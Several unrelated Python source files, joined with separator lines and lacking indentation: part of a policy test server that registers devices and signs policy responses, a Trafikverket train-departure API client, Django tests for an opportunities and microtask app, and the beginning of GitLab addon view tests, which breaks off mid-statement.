Encodes the policy into protobuf representation, signs it and constructs
the response.
Args:
msg: The CloudPolicyRequest message received from the client.
token_info: The token extracted from the request.
response: A PolicyFetchResponse message that should be filled with the
response data.
username: The username for the response. May be None.
"""
if msg.machine_id:
self.server.UpdateMachineId(token_info['device_token'], msg.machine_id)
# Response is only given if the scope is specified in the config file.
# Normally 'google/chromeos/device', 'google/chromeos/user' and
# 'google/chromeos/publicaccount' should be accepted.
policy = self.server.GetPolicies()
policy_value = ''
policy_key = msg.policy_type
if msg.settings_entity_id:
policy_key += '/' + msg.settings_entity_id
if msg.policy_type in token_info['allowed_policy_types']:
if msg.policy_type in ('google/android/user',
'google/chromeos/publicaccount',
'google/chromeos/user',
'google/chrome/user',
'google/ios/user'):
settings = cp.CloudPolicySettings()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
self.GatherUserPolicySettings(settings, policy.get(policy_key, {}))
payload = settings.SerializeToString()
elif msg.policy_type == 'google/chromeos/device':
settings = dp.ChromeDeviceSettingsProto()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
self.GatherDevicePolicySettings(settings, policy.get(policy_key, {}))
payload = settings.SerializeToString()
elif msg.policy_type == 'google/chrome/extension':
settings = ep.ExternalPolicyData()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
payload = self.CreatePolicyForExternalPolicyData(policy_key)
else:
response.error_code = 400
response.error_message = 'Invalid policy type'
return
else:
response.error_code = 400
response.error_message = 'Request not allowed for the token used'
return
# Sign with 'current_key_index', defaulting to key 0.
signing_key = None
req_key = None
current_key_index = policy.get('current_key_index', 0)
nkeys = len(self.server.keys)
if (msg.signature_type == dm.PolicyFetchRequest.SHA1_RSA and
current_key_index in range(nkeys)):
signing_key = self.server.keys[current_key_index]
if msg.public_key_version in range(1, nkeys + 1):
# requested key exists, use for signing and rotate.
req_key = self.server.keys[msg.public_key_version - 1]['private_key']
# Fill the policy data protobuf.
policy_data = dm.PolicyData()
policy_data.policy_type = msg.policy_type
policy_data.timestamp = int(time.time() * 1000)
policy_data.request_token = token_info['device_token']
policy_data.policy_value = payload
policy_data.machine_name = token_info['machine_name']
policy_data.valid_serial_number_missing = (
token_info['machine_id'] in BAD_MACHINE_IDS)
policy_data.settings_entity_id = msg.settings_entity_id
policy_data.service_account_identity = policy.get(
'service_account_identity',
'policy_testserver.py-service_account_identity')
invalidation_source = policy.get('invalidation_source')
if invalidation_source is not None:
policy_data.invalidation_source = invalidation_source
# Since invalidation_name is type bytes in the proto, the Unicode name
# provided needs to be encoded as ASCII to set the correct byte pattern.
invalidation_name = policy.get('invalidation_name')
if invalidation_name is not None:
policy_data.invalidation_name = invalidation_name.encode('ascii')
if signing_key:
policy_data.public_key_version = current_key_index + 1
if username:
policy_data.username = username
else:
# If the correct |username| is unknown, rely on a manually-configured
# username from the configuration file or use a default.
policy_data.username = policy.get('policy_user', 'user@example.com')
policy_data.device_id = token_info['device_id']
# Set affiliation IDs so that user was managed on the device.
device_affiliation_ids = policy.get('device_affiliation_ids')
if device_affiliation_ids:
policy_data.device_affiliation_ids.extend(device_affiliation_ids)
user_affiliation_ids = policy.get('user_affiliation_ids')
if user_affiliation_ids:
policy_data.user_affiliation_ids.extend(user_affiliation_ids)
signed_data = policy_data.SerializeToString()
response.policy_data = signed_data
if signing_key:
response.policy_data_signature = (
bytes(signing_key['private_key'].hashAndSign(signed_data)))
if msg.public_key_version != current_key_index + 1:
response.new_public_key = signing_key['public_key']
# Set the verification signature appropriate for the policy domain.
# TODO(atwilson): Use the enrollment domain for public accounts when
# we add key validation for ChromeOS (http://crbug.com/328038).
if 'signatures' in signing_key:
verification_sig = self.GetSignatureForDomain(
signing_key['signatures'], policy_data.username)
if verification_sig:
assert len(verification_sig) == 256, \
'bad signature size: %d' % len(verification_sig)
response.new_public_key_verification_signature = verification_sig
if req_key:
response.new_public_key_signature = (
bytes(req_key.hashAndSign(response.new_public_key)))
return (200, response.SerializeToString())
def GetSignatureForDomain(self, signatures, username):
parsed_username = username.split("@", 1)
if len(parsed_username) != 2:
logging.error('Could not extract domain from username: %s' % username)
return None
domain = parsed_username[1]
# Lookup the domain's signature in the passed dictionary. If none is found,
# fallback to a wildcard signature.
if domain in signatures:
return signatures[domain]
if '*' in signatures:
return signatures['*']
# No key matching this domain.
logging.error('No verification signature matching domain: %s' % domain)
return None
def CheckToken(self):
"""Helper for checking whether the client supplied a valid DM token.
Extracts the token from the request and passed to the server in order to
look up the client.
Returns:
A pair of token information record and error response. If the first
element is None, then the second contains an error code to send back to
the client. Otherwise the first element is the same structure that is
returned by LookupToken().
"""
error = 500
dmtoken = None
request_device_id = self.GetUniqueParam('deviceid')
match = re.match('GoogleDMToken token=(\\w+)',
self.headers.getheader('Authorization', ''))
if match:
dmtoken = match.group(1)
if not dmtoken:
error = 401
else:
token_info = self.server.LookupToken(dmtoken)
if (not token_info or
not request_device_id or
token_info['device_id'] != request_device_id):
error = 410
else:
return (token_info, None)
logging.debug('Token check failed with error %d' % error)
return (None, (error, 'Server error %d' % error))
def DumpMessage(self, label, msg):
"""Helper for logging an ASCII dump of a protobuf message."""
logging.debug('%s\n%s' % (label, str(msg)))
class PolicyTestServer(testserver_base.BrokenPipeHandlerMixIn,
testserver_base.StoppableHTTPServer):
"""Handles requests and keeps global service state."""
def __init__(self, server_address, data_dir, policy_path, client_state_file,
private_key_paths, server_base_url):
"""Initializes the server.
Args:
server_address: Server host and port.
policy_path: Names the file to read JSON-formatted policy from.
private_key_paths: List of paths to read private keys from.
"""
testserver_base.StoppableHTTPServer.__init__(self, server_address,
PolicyRequestHandler)
self._registered_tokens = {}
self.data_dir = data_dir
self.policy_path = policy_path
self.client_state_file = client_state_file
self.server_base_url = server_base_url
self.keys = []
if private_key_paths:
# Load specified keys from the filesystem.
for key_path in private_key_paths:
try:
key_str = open(key_path).read()
except IOError:
print 'Failed to load private key from %s' % key_path
continue
try:
key = tlslite.api.parsePEMKey(key_str, private=True)
except SyntaxError:
key = tlslite.utils.python_rsakey.Python_RSAKey._parsePKCS8(
bytearray(key_str))
assert key is not None
key_info = { 'private_key' : key }
# Now try to read in a signature, if one exists.
try:
key_sig = open(key_path + '.sig').read()
# Create a dictionary with the wildcard domain + signature
key_info['signatures'] = {'*': key_sig}
except IOError:
print 'Failed to read validation signature from %s.sig' % key_path
self.keys.append(key_info)
else:
# Use the canned private keys if none were passed from the command line.
for signing_key in SIGNING_KEYS:
decoded_key = base64.b64decode(signing_key['key']);
key = tlslite.utils.python_rsakey.Python_RSAKey._parsePKCS8(
bytearray(decoded_key))
assert key is not None
# Grab the signature dictionary for this key and decode all of the
# signatures.
signature_dict = signing_key['signatures']
decoded_signatures = {}
for domain in signature_dict:
decoded_signatures[domain] = base64.b64decode(signature_dict[domain])
self.keys.append({'private_key': key,
'signatures': decoded_signatures})
# Derive the public keys from the private keys.
for entry in self.keys:
key = entry['private_key']
algorithm = asn1der.Sequence(
[ asn1der.Data(asn1der.OBJECT_IDENTIFIER, PKCS1_RSA_OID),
asn1der.Data(asn1der.NULL, '') ])
rsa_pubkey = asn1der.Sequence([ asn1der.Integer(key.n),
asn1der.Integer(key.e) ])
pubkey = asn1der.Sequence([ algorithm, asn1der.Bitstring(rsa_pubkey) ])
entry['public_key'] = pubkey
# Load client state.
if self.client_state_file is not None:
try:
file_contents = open(self.client_state_file).read()
self._registered_tokens = json.loads(file_contents, strict=False)
except IOError:
pass
def GetPolicies(self):
"""Returns the policies to be used, reloaded from the backend file every
time this is called.
"""
policy = {}
if json is None:
logging.error('No JSON module, cannot parse policy information')
else :
try:
policy = json.loads(open(self.policy_path).read(), strict=False)
except IOError:
logging.error('Failed to load policies from %s' % self.policy_path)
return policy
def ResolveUser(self, auth_token):
"""Tries to resolve an auth token to the corresponding user name.
If enabled, this makes a request to the token info endpoint to determine the
user ID corresponding to the token. If token resolution is disabled or the
request fails, this will return the policy_user config parameter.
"""
config = self.GetPolicies()
token_info_url = config.get('token_info_url')
if token_info_url is not None:
try:
token_info = urllib2.urlopen(token_info_url + '?' +
urllib.urlencode({'access_token': auth_token})).read()
return json.loads(token_info)['email']
except Exception as e:
logging.info('Failed to resolve user: %s', e)
return config.get('policy_user')
def RegisterDevice(self, device_id, machine_id, type, username):
"""Registers a device or user and generates a DM token for it.
Args:
device_id: The device identifier provided by the client.
Returns:
The newly generated device token for the device.
"""
dmtoken_chars = []
while len(dmtoken_chars) < 32:
dmtoken_chars.append(random.choice('0123456789abcdef'))
dmtoken = ''.join(dmtoken_chars)
allowed_policy_types = {
dm.DeviceRegisterRequest.BROWSER: [
'google/chrome/user',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.USER: [
'google/chromeos/user',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.DEVICE: [
'google/chromeos/device',
'google/chromeos/publicaccount',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.ANDROID_BROWSER: [
'google/android/user'
],
dm.DeviceRegisterRequest.IOS_BROWSER: [
'google/ios/user'
],
dm.DeviceRegisterRequest.TT: ['google/chromeos/user',
'google/chrome/user'],
}
if machine_id in KIOSK_MACHINE_IDS:
enrollment_mode = dm.DeviceRegisterResponse.RETAIL
else:
enrollment_mode = dm.DeviceRegisterResponse.ENTERPRISE
self._registered_tokens[dmtoken] = {
'device_id': device_id,
'device_token': dmtoken,
'allowed_policy_types': allowed_policy_types[type],
'machine_name': 'chromeos-' + machine_id,
'machine_id': machine_id,
'enrollment_mode': enrollment_mode,
'username': username,
}
self.WriteClientState()
return self._registered_tokens[dmtoken]
def UpdateMachineId(self, dmtoken, machine_id):
"""Updates the machine identifier for a registered device.
Args:
dmtoken: The device management token provided by the client.
machine_id: Updated hardware identifier value.
"""
if dmtoken in self._registered_tokens:
self._registered_tokens[dmtoken]['machine_id'] = machine_id
self.WriteClientState()
def UpdateStateKeys(self, dmtoken, state_keys):
"""Updates the state keys for a given client.
Args:
dmtoken: The device management token provided by the client.
state_keys: The state keys to set.
"""
if dmtoken in self._registered_tokens:
self._registered_tokens[dmtoken]['state_keys'] = map(
lambda key : key.encode('hex'), state_keys)
self.WriteClientState()
def LookupToken(self, dmtoken):
"""Looks up a device or a user by DM token.
Args:
dmtoken: The device management token provided by the client.
Returns:
A dictionary with information about a device or user that is registered by
dmtoken, or None if the token is not found.
"""
return self._registered_tokens.get(dmtoken, None)
def LookupByStateKey(self, state_key):
"""Looks up a device or a user by a state key.
Args:
state_key: The state key provided by the client.
Returns:
A dictionary with information about a device or user or None if there is
no matching record.
"""
for client in self._registered_tokens.values():
if state_key.encode('hex') in client.get('state_keys', []):
return client
return None
def GetMatchingStateKeyHashes(self, modulus, remainder):
"""Returns all clients registered with the server.
Returns:
The list of registered clients.
"""
state_keys = sum([ c.get('state_keys', [])
for c in self._registered_tokens.values() ], [])
hashed_keys = map(lambda key: hashlib.sha256(key.decode('hex')).digest(),
set(state_keys))
return filter(
lambda hash : int(hash.encode('hex'), 16) % modulus == remainder,
hashed_keys)
def UnregisterDevice(self, dmtoken):
"""Unregisters a device identified by the given DM token.
Args:
dmtoken: The device management token provided by the client.
"""
if dmtoken in self._registered_tokens.keys():
del self._registered_tokens[dmtoken]
self.WriteClientState()
def WriteClientState(self):
"""Writes the client state back to the file."""
if self.client_state_file is not None:
json_data = json.dumps(self._registered_tokens)
open(self.client_state_file, 'w').write(json_data)
def GetBaseFilename(self, policy_selector):
"""Returns the base filename for the given policy_selector.
Args:
policy_selector: The policy type and settings entity id, joined by '/'.
Returns:
The filename corresponding to the policy_selector, without a file
extension.
"""
sanitized_policy_selector = re.sub('[^A-Za-z0-9.@-]', '_', policy_selector)
return os.path.join(self.data_dir or '',
'policy_%s' % sanitized_policy_selector)
def ListMatchingComponents(self, policy_type):
"""Returns a list of settings entity IDs that have a configuration file.
Args:
policy_type: The policy type to look for. Only settings entity IDs for
file selectors That match this policy_type will be returned.
Returns:
A list of settings entity IDs for the given |policy_type| that have a
configuration file in this server (either as a .bin, .txt or .data file).
"""
base_name = self.GetBaseFilename(policy_type)
files = glob.glob('%s_*.*' % base_name)
len_base_name = len(base_name) + 1
return [ file[len_base_name:file.rfind('.')] for file in files ]
def ReadPolicyFromDataDir(self, policy_selector, proto_message):
"""Tries to read policy payload from a file in the data directory.
First checks for a binary rendition of the policy protobuf in
<data_dir>/policy_<sanitized_policy_selector>.bin. If that exists, returns
it. If that file doesn't exist, tries
<data_dir>/policy_<sanitized_policy_selector>.txt and decodes that as a
protobuf using proto_message. If that fails as well, returns None.
Args:
policy_selector: Selects which policy to read.
proto_message: Optional protobuf message object used for decoding the
proto text format.
Returns:
The binary payload message, or None if not found.
"""
base_filename = self.GetBaseFilename(policy_selector)
# Try the binary payload file first.
try:
return open(base_filename + '.bin').read()
except IOError:
pass
# If that fails, try the text version instead.
if proto_message is None:
return None
try:
text = open(base_filename + '.txt').read()
google.protobuf.text_format.Merge(text, proto_message)
return proto_message.SerializeToString()
except IOError:
return None
except google.protobuf.text_format.ParseError:
return None
def ReadPolicyDataFromDataDir(self, policy_selector):
"""Returns the external policy data for |policy_selector| if found.
Args:
policy_selector: Selects which policy to read.
Returns:
The data for the corresponding policy type and entity id, if found.
"""
base_filename = self.GetBaseFilename(policy_selector)
try:
return open(base_filename + '.data').read()
except IOError:
return None
def GetBaseURL(self):
"""Returns the server base URL.
Respects the |server_base_url| configuration parameter, if present. Falls
back to construct the URL from the server hostname and port otherwise.
Returns:
The URL to use for constructing URLs that get returned to clients.
"""
base_url = self.server_base_url
if base_url is None:
base_url = 'http://%s:%s' % self.server_address[:2]
return base_url
class PolicyServerRunner(testserver_base.TestServerRunner):
def __init__(self):
super(PolicyServerRunner, self).__init__()
def create_server(self, server_data):
data_dir = self.options.data_dir or ''
config_file = (self.options.config_file or
os.path.join(data_dir, 'device_management'))
server = PolicyTestServer((self.options.host, self.options.port),
data_dir, config_file,
self.options.client_state_file,
self.options.policy_keys,
self.options.server_base_url)
server_data['port'] = server.server_port
return server
def add_options(self):
testserver_base.TestServerRunner.add_options(self)
self.option_parser.add_option('--client-state', dest='client_state_file',
help='File that client state should be '
'persisted to. This allows the server to be '
'seeded by a list of pre-registered clients '
'and restarts without abandoning registered '
'clients.')
self.option_parser.add_option('--policy-key', action='append',
dest='policy_keys',
help='Specify a path to a PEM-encoded '
'private key to use for policy signing. May '
'be specified multiple times in order to '
'load multiple keys into the server. If the '
'server has multiple keys, it will rotate '
'through them in at each request in a '
'round-robin fashion. The server will '
'use a canned key if none is specified '
'on the command line. The test server will '
'also look for a verification signature file '
'in the same location: <filename>.sig and if '
'present will add the signature to the '
'policy blob as appropriate via the '
'new_public_key_verification_signature '
'field.')
self.option_parser.add_option('--log-level', dest='log_level',
default='WARN',
help='Log level threshold to use.')
self.option_parser.add_option('--config-file', dest='config_file',
help='Specify a configuration file to use '
'instead of the default '
'<data_dir>/device_management')
self.option_parser.add_option('--server-base-url', dest='server_base_url',
help='The server base URL to use when '
'constructing URLs to return to the client.')
def run_server(self):
logger = logging.getLogger()
logger.setLevel(getattr(logging, str(self.options.log_level).upper()))
if (self.options.log_to_console):
logger.addHandler(logging.StreamHandler())
if (self.options.log_file):
logger.addHandler(logging.FileHandler(self.options.log_file))
testserver_base.TestServerRunner.run_server(self)
if __name__ == '__main__':
sys.exit(PolicyServerRunner().main())
|
|
"""Enables retreival of train departure information from Trafikverket API."""
import typing
from datetime import datetime, timedelta
from enum import Enum
import aiohttp
from pytrafikverket.trafikverket import (
FieldFilter, FieldSort, FilterOperation, NodeHelper, OrFilter, SortOrder,
Trafikverket)
class StationInfo(object):
"""Contains information about a train station."""
_required_fields = ["LocationSignature", "AdvertisedLocationName"]
def __init__(self, signature: str, name: str, advertised: str):
"""Initialize StationInfo class."""
self.signature = signature
self.name = name
self.advertised = advertised
@classmethod
def from_xml_node(cls, node):
"""Map station information in XML data."""
node_helper = NodeHelper(node)
location_signature = node_helper.get_text("LocationSignature")
advertised_location_name = \
node_helper.get_text("AdvertisedLocationName")
location_advertised = node_helper.get_text("Advertised")
return cls(location_signature,
advertised_location_name,
location_advertised)
class TrainStopStatus(Enum):
"""Contain the different train stop statuses."""
on_time = "scheduled to arrive on schedule"
delayed = "delayed"
canceled = "canceled"
class TrainStop(object):
"""Contain information about a train stop."""
_required_fields = ["ActivityId", "Canceled", "AdvertisedTimeAtLocation",
"EstimatedTimeAtLocation", "TimeAtLocation",
"OtherInformation", "Deviation", "ModifiedTime"]
def __init__(self, id, canceled: bool,
advertised_time_at_location: datetime,
estimated_time_at_location: datetime,
time_at_location: datetime,
other_information: typing.List[str],
deviations: typing.List[str],
modified_time: datetime):
"""Initialize TrainStop."""
self.id = id
self.canceled = canceled
self.advertised_time_at_location = advertised_time_at_location
self.estimated_time_at_location = estimated_time_at_location
self.time_at_location = time_at_location
self.other_information = other_information
self.deviations = deviations
self.modified_time = modified_time
def get_state(self) -> TrainStopStatus:
"""Retrieve the state of the departure."""
if self.canceled:
return TrainStopStatus.canceled
if (self.advertised_time_at_location is not None and
self.time_at_location is not None and
self.advertised_time_at_location != self.time_at_location):
return TrainStopStatus.delayed
if (self.advertised_time_at_location is not None and
self.estimated_time_at_location is not None and
self.advertised_time_at_location !=
self.estimated_time_at_location):
return TrainStopStatus.delayed
return TrainStopStatus.on_time
def get_delay_time(self) -> timedelta:
"""Calculate the delay of a departure."""
if self.canceled:
return None
if (self.advertised_time_at_location is not None and
self.time_at_location is not None and
self.advertised_time_at_location != self.time_at_location):
return self.time_at_location - self.advertised_time_at_location
if (self.advertised_time_at_location is not None and
self.estimated_time_at_location is not None and
self.advertised_time_at_location !=
self.estimated_time_at_location):
return self.estimated_time_at_location - \
self.advertised_time_at_location
return None
@classmethod
def from_xml_node(cls, node):
"""Map the path in the return XML data."""
node_helper = NodeHelper(node)
activity_id = node_helper.get_text("ActivityId")
canceled = node_helper.get_bool("Canceled")
advertised_time_at_location = node_helper.get_datetime(
"AdvertisedTimeAtLocation")
estimated_time_at_location = node_helper.get_datetime(
"EstimatedTimeAtLocation")
time_at_location = node_helper.get_datetime("TimeAtLocation")
other_information = node_helper.get_texts("OtherInformation")
deviations = node_helper.get_texts("Deviation")
modified_time = node_helper.get_datetime_for_modified("ModifiedTime")
return cls(activity_id, canceled, advertised_time_at_location,
estimated_time_at_location, time_at_location,
other_information, deviations, modified_time)
class TrafikverketTrain(object):
"""Class used to communicate with trafikverket's train api."""
def __init__(self, client_session: aiohttp.ClientSession, api_key: str):
"""Initialize TrainInfo object."""
self._api = Trafikverket(client_session, api_key)
async def async_get_train_station(self, location_name: str) -> StationInfo:
"""Retreive train station id based on name."""
train_stations = await self._api.async_make_request(
"TrainStation",
StationInfo._required_fields,
[FieldFilter(FilterOperation.equal,
"AdvertisedLocationName", location_name),
FieldFilter(FilterOperation.equal, "Advertised", "true")])
if len(train_stations) == 0:
raise ValueError(
"Could not find a station with the specified name")
if len(train_stations) > 1:
raise ValueError(
"Found multiple stations with the specified name")
return StationInfo.from_xml_node(train_stations[0])
async def async_search_train_stations(
self, location_name: str) -> typing.List[StationInfo]:
"""Search for train stations."""
train_stations = await self._api.async_make_request(
"TrainStation",
["AdvertisedLocationName", "LocationSignature",
"Advertised", "Deleted"],
[FieldFilter(FilterOperation.like,
"AdvertisedLocationName", location_name),
FieldFilter(FilterOperation.equal, "Advertised", "true")])
if len(train_stations) == 0:
raise ValueError(
"Could not find a station with the specified name")
result = [StationInfo] * 0
for train_station in train_stations:
result.append(StationInfo.from_xml_node(train_station))
return result
async def async_get_train_stop(
self, from_station: StationInfo,
to_station: StationInfo, time_at_location: datetime) -> TrainStop:
"""Retrieve the train stop."""
date_as_text = time_at_location.strftime(Trafikverket.date_time_format)
filters = [FieldFilter(FilterOperation.equal,
"ActivityType", "Avgang"),
FieldFilter(FilterOperation.equal,
"LocationSignature",
from_station.signature),
FieldFilter(FilterOperation.equal,
"AdvertisedTimeAtLocation",
date_as_text),
OrFilter([FieldFilter(FilterOperation.equal,
"ViaToLocation.LocationName",
to_station.signature),
FieldFilter(FilterOperation.equal,
"ToLocation.LocationName",
to_station.signature)])]
train_announcements = await self._api.async_make_request(
"TrainAnnouncement", TrainStop._required_fields, filters)
if len(train_announcements) == 0:
raise ValueError("No TrainAnnouncement found")
if len(train_announcements) > 1:
raise ValueError("Multiple TrainAnnouncements found")
train_announcement = train_announcements[0]
return TrainStop.from_xml_node(train_announcement)
async def async_get_next_train_stop(
self, from_station: StationInfo,
to_station: StationInfo,
after_time: datetime) -> TrainStop:
"""Enable retreival of next departure."""
date_as_text = after_time.strftime(Trafikverket.date_time_format)
filters = [FieldFilter(FilterOperation.equal,
"ActivityType",
"Avgang"),
FieldFilter(FilterOperation.equal,
"LocationSignature",
from_station.signature),
FieldFilter(FilterOperation.greater_than_equal,
"AdvertisedTimeAtLocation",
date_as_text),
OrFilter([FieldFilter(FilterOperation.equal,
"ViaToLocation.LocationName",
to_station.signature),
FieldFilter(FilterOperation.equal,
"ToLocation.LocationName",
to_station.signature)])]
sorting = [FieldSort("AdvertisedTimeAtLocation", SortOrder.ascending)]
train_announcements = await self._api.async_make_request(
"TrainAnnouncement",
TrainStop._required_fields,
filters,
1,
sorting)
if len(train_announcements) == 0:
raise ValueError("No TrainAnnouncement found")
if len(train_announcements) > 1:
raise ValueError("Multiple TrainAnnouncements found")
train_announcement = train_announcements[0]
return TrainStop.from_xml_node(train_announcement)
|
|
from django.contrib.auth.models import User
from ummeli.vlive.tests.utils import VLiveClient, VLiveTestCase
from ummeli.opportunities.models import *
from django.core.urlresolvers import reverse
from datetime import datetime, timedelta
from django.contrib.sites.models import Site
class OpportunitiesTest(VLiveTestCase):
fixtures = [
'vlive/tests/auth/fixtures/sample.json',
'fixtures/opportunities.provinces.json',
'opportunities/fixtures/test.opportunities.json',
]
def setUp(self):
self.msisdn = '27123456789'
self.pin = '1234'
self.client = VLiveClient(HTTP_X_UP_CALLING_LINE_ID=self.msisdn)
def test_province_from_str(self):
p = Province.from_str('Gauteng')
self.assertEqual(p.get_province_display(), 'Gauteng')
p = Province.from_str('KwaZulu Natal')
self.assertEqual(p.get_province_display(), 'KwaZulu Natal')
p = Province.from_str('Kwa-Zulu Natal')
self.assertEqual(p.get_province_display(), 'KwaZulu Natal')
p = Province.from_str('Western Cape')
self.assertEqual(p.get_province_display(), 'Western Cape')
def test_internship(self):
self.login()
self.fill_in_basic_info()
user = User.objects.get(username=self.msisdn)
salary = Salary(amount=50, frequency=1)
salary.save()
i = Internship.objects.create(title='Test op',
description='This is a test',
owner=user,
salary=salary,
state='published')
i.province.add(2)
i.province.add(3)
i.save()
self.assertEqual(user.modelbase_set.filter(slug=i.slug).count(), 1)
self.assertEqual(user.modelbase_set.all()[0].ummeliopportunity.internship.salary.amount, 50)
self.assertEqual(user.modelbase_set.all()[0].ummeliopportunity.internship.education, 0)
self.assertEqual(user.modelbase_set.all()[0].ummeliopportunity.internship.province.count(), 2)
resp = self.client.get(reverse('internships'))
self.assertContains(resp, 'Test op')
resp = self.client.get(reverse('internship_detail', kwargs={'slug': 'test-op'}))
self.assertContains(resp, 'Test op')
self.assertContains(resp, 'This is a test')
def test_training(self):
self.login()
self.fill_in_basic_info()
user = User.objects.get(username=self.msisdn)
i = Training.objects.create(title='Test op',
description='This is a test',
owner=user,
cost=300)
self.assertEqual(user.modelbase_set.filter(slug=i.slug).count(), 1)
self.assertEqual(user.modelbase_set.all()[0].ummeliopportunity.training.cost, 300)
def test_event(self):
self.login()
self.fill_in_basic_info()
user = User.objects.get(username=self.msisdn)
i = Event.objects.create(title='Test op',
description='This is a test',
owner=user,
place='Salt River')
self.assertEqual(user.modelbase_set.filter(slug=i.slug).count(), 1)
self.assertEqual(user.modelbase_set.all()[0].event.place, 'Salt River')
def test_change_province_session(self):
self.login()
self.fill_in_basic_info()
user = User.objects.get(username=self.msisdn)
province = Province.objects.get(province=3)
i = Event.objects.create(title='Test op',
description='This is a test',
owner=user,
place='Salt River',
state='published')
i.province.add(province)
i.save()
self.assertEqual(user.modelbase_set.filter(slug=i.slug).count(), 1)
self.assertEqual(user.modelbase_set.all()[0].event.place, 'Salt River')
resp = self.client.get(reverse('events'))
self.assertContains(resp, 'All Provinces (change)')
self.assertContains(resp, 'Location: Salt River')
resp = self.client.get(reverse('change_province'))
self.assertEqual(resp.status_code, 200)
url = '%s?next=/vlive/opportunities/events/' %\
reverse('change_province', kwargs={'province': 1})
resp = self.client.get(url)
self.assertVLiveRedirects(resp, reverse('events'))
resp = self.client.get(reverse('events'))
self.assertContains(resp, 'Eastern Cape (change)')
self.assertContains(resp, '0 events')
url = '%s?next=/vlive/opportunities/events/' %\
reverse('change_province', kwargs={'province': 3})
resp = self.client.get(url)
self.assertVLiveRedirects(resp, reverse('events'))
resp = self.client.get(reverse('events'))
self.assertContains(resp, 'Gauteng (change)')
self.assertContains(resp, 'Location: Salt River')
def test_task_checkout(self):
web_site = Site.objects.get_current()
c = Campaign.objects.create(title='Campaign1')
t1 = MicroTask(title='Test1', state='published', campaign=c)
t1.save()
t1.sites.add(web_site)
t2 = MicroTask(title='Test2', users_per_task=0, state='published',
campaign=c)
t2.save()
t2.sites.add(web_site)
t3 = MicroTask(title='Test3', users_per_task=2, state='published',
campaign=c)
t3.save()
t3.sites.add(web_site)
t4 = MicroTask(title='Test4', users_per_task=2, state='published',
campaign=c)
t4.save()
t4.sites.add(web_site)
self.assertEqual(MicroTask.permitted.all().count(), 4)
self.assertEqual(MicroTask.available.all().count(), 4)
user = User.objects.get(username=self.msisdn)
user2 = User.objects.get(username='27121111111')
#simple case - 1 user per task
self.assertTrue(t1.is_available())
result = t1.checkout(user)
self.assertTrue(result)
self.assertFalse(t1.is_available())
self.assertEqual(MicroTask.available.all().count(), 3)
tc = TaskCheckout.objects.get(user=user)
self.assertEqual(tc.task, t1)
#infinite checkouts available
self.assertTrue(t2.is_available())
result = t2.checkout(user)
self.assertTrue(result)
self.assertTrue(t2.is_available())
self.assertEqual(MicroTask.available.all().count(), 3)
#custom - 2 users per task
self.assertTrue(t3.is_available())
result = t3.checkout(user)
self.assertTrue(result)
self.assertTrue(t3.is_available())
result = t3.checkout(user2)
self.assertTrue(result)
self.assertFalse(t3.is_available())
self.assertEqual(MicroTask.available.all().count(), 2)
#negative case - user attempt to checkout a task twice
self.assertTrue(t4.is_available())
result = t4.checkout(user)
self.assertTrue(result)
self.assertTrue(t4.is_available())
result = t4.checkout(user)
self.assertFalse(result)
self.assertTrue(t4.is_available())
#test microtask response object
checkout = TaskCheckout.objects.get(task=t1)
task_response = TomTomMicroTaskResponse.objects.create(
task_checkout=checkout,
user=user,
state=SUBMITTED,
task=t1)
self.assertIsNotNone(checkout.microtaskresponse)
self.assertIsNotNone(checkout.microtaskresponse.tomtommicrotaskresponse)
def test_task_expiration(self):
user = User.objects.get(username=self.msisdn)
web_site = Site.objects.get_current()
c = Campaign.objects.create(title='Campaign1')
t1 = MicroTask(title='task1', state='published', campaign=c)
t1.save()
t1.sites.add(web_site)
t2 = MicroTask(title='task2', state='published', campaign=c)
t2.save()
t2.sites.add(web_site)
c.tasks.add(t1)
c.tasks.add(t2)
self.assertTrue(t1.is_available())
d1 = datetime.now() - timedelta(hours=16)
t1.checkout(user)
t_checkout = t1.taskcheckout_set.all()[0]
t_checkout.date = d1
t_checkout.save()
MicroTask.expire_tasks()
self.assertFalse(t1.is_available())
self.assertTrue(t2.is_available())
d1 = datetime.now() - timedelta(hours=25)
t2.checkout(user)
t_checkout = t2.taskcheckout_set.all()[0]
t_checkout.date = d1
t_checkout.save()
MicroTask.expire_tasks()
self.assertTrue(t2.is_available())
self.assertEqual(Campaign.available_tasks().count(), 1)
|
|
# -*- coding: utf-8 -*-
from rest_framework import status as http_status
import mock
import datetime
import pytest
import unittest
from json import dumps
from nose.tools import * # noqa (PEP8 asserts)
from tests.base import OsfTestCase, get_default_metaschema
from osf_tests.factories import ProjectFactory, UserFactory, AuthUserFactory
from github3.repos.branch import Branch
from framework.exceptions import HTTPError
from framework.auth import Auth
from addons.base.tests.views import (
OAuthAddonAuthViewsTestCaseMixin, OAuthAddonConfigViewsTestCaseMixin
)
from addons.gitlab import utils
from addons.gitlab.api import GitLabClient
from addons.gitlab.serializer import GitLabSerializer
from addons.gitlab.utils import check_permissions
from addons.gitlab.tests.utils import create_mock_gitlab, GitLabAddonTestCase
from addons.gitlab.tests.factories import GitLabAccountFactory
pytestmark = pytest.mark.django_db
class TestGitLabAuthViews(GitLabAddonTestCase, OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):
@mock.patch(
'addons.gitlab.models.UserSettings.revoke_remote_oauth_access',
mock.PropertyMock()
)
def test_delete_external_account(self):
super(TestGitLabAuthViews, self).test_delete_external_account()
def test_oauth_start(self):
pass
def test_oauth_finish(self):
pass
class TestGitLabConfigViews(GitLabAddonTestCase, OAuthAddonConfigViewsTestCaseMixin, OsfTestCase):
folder = None
Serializer = GitLabSerializer
client = GitLabClient
## Overrides ##
def setUp(self):
super(TestGitLabConfigViews, self).setUp()
self.mock_api_user = mock.patch('addons.gitlab.api.GitLabClient.user')
self.mock_api_user.return_value = mock.Mock()
self.mock_api_user.start()
def tearDown(self):
self.mock_api_user.stop()
super(TestGitLabConfigViews, self).tearDown()
def test_folder_list(self):
# GH only lists root folder (repos), this test is superfluous
pass
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.views.GitLabClient.repo')
def test_set_config(self, mock_repo, mock_add_hook):
# GH selects repos, not folders, so this needs to be overriden
mock_repo.return_value = 'repo_name'
url = self.project.api_url_for('{0}_set_config'.format(self.ADDON_SHORT_NAME))
res = self.app.post_json(url, {
